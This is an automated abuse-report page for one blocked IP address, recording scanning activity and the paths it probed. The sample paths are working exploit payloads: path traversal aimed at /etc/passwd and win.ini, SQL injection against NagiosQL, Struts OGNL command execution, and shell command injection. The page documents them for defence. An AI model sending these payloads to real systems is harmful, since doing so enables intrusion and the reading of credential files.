abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 31
- Unique targets hit
- 1
- Unique paths probed
- 420
- Detection count
- 3
- First seen
- 2026-07-07 09:48:32 UTC
- Last seen
- 2026-07-07 10:46:54 UTC
- Block expires
- 2026-07-08 10:47:35 UTC
Sample paths probed
- /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini
- /nagiosql/admin/menuaccess.php
- /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(2029824116))%23
- /jolokia/read/getDiagnosticOptions
- /.../.../.../.../.../.../.../.../.../windows/win.ini
- /%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%[email protected]@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%[email protected]@getResponse%28%29.getOutputStream%28%29%29%29.%[email protected]@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
- /nagiosql/admin/logbook.php
- /uir//etc/passwd
- /%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%[email protected]@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29%29.%[email protected]@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
- /struts2-rest-showcase/orders/3
- /..../..../..../..../..../..../..../..../..../windows/win.ini
- /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
- /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
- /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
- /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
- /upload/index.php?route=extension/payment/divido/update
- /command.cgi?cat%20/etc/passwd
- /orders/3
- /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini
- /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5(2080894269))%23
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.